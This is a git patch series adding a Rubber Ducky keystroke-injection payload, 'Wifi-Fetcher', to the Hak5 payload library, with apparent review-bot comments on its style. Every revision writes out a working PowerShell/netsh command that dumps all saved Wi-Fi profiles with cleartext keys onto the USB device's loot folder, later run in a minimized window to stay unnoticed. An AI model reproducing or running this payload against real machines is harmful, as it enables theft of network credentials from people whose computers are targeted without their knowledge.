From 85a40615805b65aa37e474488a6c27ac50238b20 Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Sun, 31 Dec 2023 23:24:19 +0100 Subject: [PATCH 1/9] Create Wifi-Fetcher Adding a payload to the Hak5 liberary --- payloads/library/exfiltration/Wifi-Fetcher | 24 ++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 payloads/library/exfiltration/Wifi-Fetcher diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher new file mode 100644 index 000000000..fda845f4a --- /dev/null +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -0,0 +1,24 @@ +REM NAME: Wifi-Fetcher +REM AUTHOR: nightcrafttrl1 +REM DEVICE: RubberDucky +REM TARGETS: WINDOWS 7 or greater +REM DESCRIPTION: This payload will fetch the windows system +REM for the passwords and other info about every wifi network the system can connect to +REM credits:ChatGPT helped a little here and there +DELAY 1000 +REM Switch to HID STORAGE mode +ATTACKMODE HID STORAGE +DELAY 3000 +GUI r +DELAY 100 +STRINGLN cmd +ENTER +DELAY 500 +STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" +ENTER +DELAY 3000 +REM Append a 0.5-second delay, exit PowerShell, and turn off DuckyScript +STRING exit +ENTER +DELAY 500 +ATTACKMODE OFF From b46152a80d3b1630f30660c7422e17eb07f09caf Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:35:01 +0100 Subject: [PATCH 2/9] Update Wifi-Fetcher --- payloads/library/exfiltration/Wifi-Fetcher | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
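Review bot: The comment `REM Append a 0.5-second delay, exit PowerShell, and turn off DuckyScript` in the new file does not match the lines below it: the 500 ms delay comes after `STRING exit`/`ENTER`, not before, the `exit` is typed into the cmd window (the `powershell -c` call presumably has returned by then), and `ATTACKMODE OFF` ends HID attack mode rather than turning off DuckyScript. Replace it with `REM Close the cmd window, then leave HID mode`. `STRINGLN cmd` followed by `ENTER` sends Enter twice, while the later lines use `STRING ... ENTER`; pick one idiom. If the library's header template expects further fields (CATEGORY, VERSION), they are missing here — confirm against the sibling payloads in payloads/library/exfiltration.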
diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index fda845f4a..e5ce7d75b 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -5,6 +5,7 @@ REM TARGETS: WINDOWS 7 or greater REM DESCRIPTION: This payload will fetch the windows system REM for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there +REM DEPENDENCIES: NONE DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE @@ -16,8 +17,7 @@ ENTER DELAY 500 STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 3000 -REM Append a 0.5-second delay, exit PowerShell, and turn off DuckyScript +DELAY 300 STRING exit ENTER DELAY 500 From 8539d67e70e4beeead173f5e2201e7e5756c219e Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:35:44 +0100 Subject: [PATCH 3/9] Update Wifi-Fetcher Shortened Overall Runtime --- payloads/library/exfiltration/Wifi-Fetcher | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index e5ce7d75b..2e685e2a2 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -20,5 +20,4 @@ ENTER DELAY 300 STRING exit ENTER -DELAY 500 ATTACKMODE OFF From d6c121950c90c82e925acb15a890161b13b848e0 Mon Sep 17 00:00:00 2001 
From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:38:01 +0100 Subject: [PATCH 4/9] Update Wifi-Fetcher obfuscation by making the cmd less readable --- payloads/library/exfiltration/Wifi-Fetcher | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 2e685e2a2..81652b0ff 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -15,9 +15,13 @@ DELAY 100 STRINGLN cmd ENTER DELAY 500 +STRINGLN color FE +DELAY 100 +REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER DELAY 300 STRING exit ENTER +DELAY 500 ATTACKMODE OFF From 6d191f7fd6d69cbd1b009b701f9396198fc55ccd Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 01:00:33 +0100 Subject: [PATCH 5/9] Update Wifi-Fetcher fixed error with Delays . Removed the obfuscation because it was affecting the executiontime too much. also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script --- payloads/library/exfiltration/Wifi-Fetcher | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 81652b0ff..a287e8372 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher 
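Review bot: The hunk mixes the two keystroke idioms — `STRINGLN color FE` on one line, `STRING powershell ...` plus `ENTER` and `STRING exit` plus `ENTER` on the others — and the patch 5 hunk then swaps `cmd` to `STRING`+`ENTER` while moving `exit` to `STRINGLN`; settle on one form. The new `STRINGLN color FE` carries no comment saying why it is there (only the commit message does), and `REM Fetch and Save` names neither what is fetched nor where it goes; `REM Write every saved WLAN profile, keys included, to D:\loot\PwnedWIFI on the mass-storage partition` would. This hunk also re-adds the `DELAY 500` before `ATTACKMODE OFF` that the previous commit removed, which the message does not mention.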
@@ -9,19 +9,15 @@ REM DEPENDENCIES: NONE DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE -DELAY 3000 +DELAY 4000 GUI r DELAY 100 -STRINGLN cmd +STRING cmd ENTER -DELAY 500 -STRINGLN color FE -DELAY 100 +DELAY 300 REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 300 -STRING exit -ENTER -DELAY 500 +DELAY 3000 +STRINGLN exit ATTACKMODE OFF From 59501f2e622971c5d32156ddfdf116def4da674c Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Tue, 2 Jan 2024 23:02:27 +0100 Subject: [PATCH 6/9] Finished Wifi-Fetcher Added DISCLAIMER and INSTRUCTIONS --- payloads/library/exfiltration/Wifi-Fetcher | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index a287e8372..6b18db4dc 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -1,3 +1,9 @@ +REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. + + +REM INSTRUCTIONS: IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE +REM After creating the directory and adjusting the delays, it IS basically plug 'n play + REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky 
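Review bot: The added `REM INSTRUCTIONS` line says the directory must exist on the Ducky, but the payload addresses it as `D:\loot\PwnedWIFI\`, i.e. it also assumes the host mounts the mass-storage partition as D:; the note should spell out that assumption, not only the directory. The six new lines sit above the `REM NAME:` metadata block, so the header no longer starts at line 1; place them after it. The text is in shouting capitals with random case (`IS`, `BE`, `Held`), `Distribute(Hak5 LLC.)` presumably means `distributor`, and `DONT` wants an apostrophe; sentence case reads better.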
@@ -20,4 +26,4 @@ STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile ENTER DELAY 3000 STRINGLN exit -ATTACKMODE OFF +ATTACKMODE OFF \ No newline at end of file From bbdc188764bb041bdcd69eac8206c3f824fc69ec Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Tue, 2 Jan 2024 23:08:12 +0100 Subject: [PATCH 7/9] Finished++ Wifi-Fetcher used DEFINE in the Script for easy adaptabillity --- payloads/library/exfiltration/Wifi-Fetcher | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 6b18db4dc..c273d1f4c 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher 
@@ -1,18 +1,21 @@ REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. - -REM INSTRUCTIONS: IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE +REM INSTRUCTIONS: IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE REM After creating the directory and adjusting the delays, it IS basically plug 'n play +DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." + +DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" + REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky REM TARGETS: WINDOWS 7 or greater -REM DESCRIPTION: This payload will fetch the windows system -REM for the passwords and other info about every wifi network the system can connect to +REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there REM DEPENDENCIES: NONE DELAY 1000 + REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 
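Review bot: `DEFINE DISC` and `DEFINE INSTR` are introduced but nothing in the file references either name, so both lines are dead and merely duplicate the REM text directly above them. Either use the constants or drop them; the same two unused DEFINE lines are carried into the patch 9 hunk at the end of the page, where the `REM INSTRUCTIONS` line they duplicated is removed, so there they become the only copy of that text and are still never expanded. The merged `REM DESCRIPTION:` line is an improvement, but the blank line added after `DELAY 1000` is unexplained and the second hunk of this patch adds another stray blank line before `REM Fetch and Save`.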
@@ -21,6 +24,7 @@ DELAY 100 STRING cmd ENTER DELAY 300 + REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER From dc3b5f70e613ff89d639752579488e84e9348e5f Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Wed, 3 Jan 2024 00:34:53 +0100 Subject: [PATCH 8/9] Last Update i hope on Wifi-Fetcher Please dont publish it yet as i will have to Test it beforehand,i will make some Last changes in the next 24 hours, then it can BE published to the repo --- payloads/library/exfiltration/Wifi-Fetcher | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index c273d1f4c..e0fcf2085 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher 
@@ -14,20 +14,15 @@ REM TARGETS: WINDOWS 7 or greater REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there REM DEPENDENCIES: NONE -DELAY 1000 +DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 GUI r DELAY 100 -STRING cmd +STRING cmd /C start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 300 +DELAY 5000 -REM Fetch and Save -STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" -ENTER -DELAY 3000 -STRINGLN exit ATTACKMODE OFF \ No newline at end of file From f5633ed55c7b283cca700396cb45f144844d81ab Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Wed, 3 Jan 2024 15:37:02 +0100 Subject: [PATCH 9/9] WE DID IT actually done for now --- payloads/library/exfiltration/Wifi-Fetcher | 34 +++++++++++----------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index e0fcf2085..96940c0f3 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher 
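Review bot: The `-DELAY 1000` / `+DELAY 1000` pair at the top of the hunk shows no visible difference, so it is presumably a trailing-whitespace change that only adds noise to the diff; revert it. Folding the PowerShell call into `STRING cmd /C start /MIN powershell "..."` also deletes `REM Fetch and Save`, the only comment on that command, leaving a very long `STRING` line with no explanation; keep a one-line REM above it. The commit message itself says the change is untested and should not be published yet, so the patch should be held as a draft until the author reports a run.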
@@ -1,28 +1,28 @@ -REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. - -REM INSTRUCTIONS: IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE -REM After creating the directory and adjusting the delays, it IS basically plug 'n play - -DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." - -DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" - REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky REM TARGETS: WINDOWS 7 or greater -REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to -REM credits:ChatGPT helped a little here and there +REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to, +REM After creating the directory and adjusting the delays, it IS basically plug 'n play +REM You are safe to plug out the rubber ducky once the minimized powershell windows closes by itself +REM +REM credits:ChatGPT helped a little here and there while debugging REM DEPENDENCIES: NONE - +REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) +DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor 
the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." +REM +DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" +REM +REM +REM DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 GUI r DELAY 100 -STRING cmd /C start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" -ENTER -DELAY 5000 - -ATTACKMODE OFF \ No newline at end of file +STRINGLN cmd +DELAY 220 +STRINGLN color FE +DELAY 50 +STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit
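Review bot: The rewritten header loses the directory requirement: the `REM INSTRUCTIONS` line is removed and the requirement now lives only in `DEFINE INSTR`, which nothing expands, while the kept line `REM After creating the directory and adjusting the delays, it IS basically plug 'n play` refers to a directory the header no longer names. State it in a REM line again, e.g. `REM REQUIRES: D:\loot\PwnedWIFI\ on the mass-storage partition`. `REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications)` should read `based on target specifications`, and `REM DESCRIPTION: ... connect to,` ends in a dangling comma. The file now also ends at the `STRINGLN start ...` line without the `ATTACKMODE OFF` every earlier revision closed with; if that is intentional, the commit message should say so.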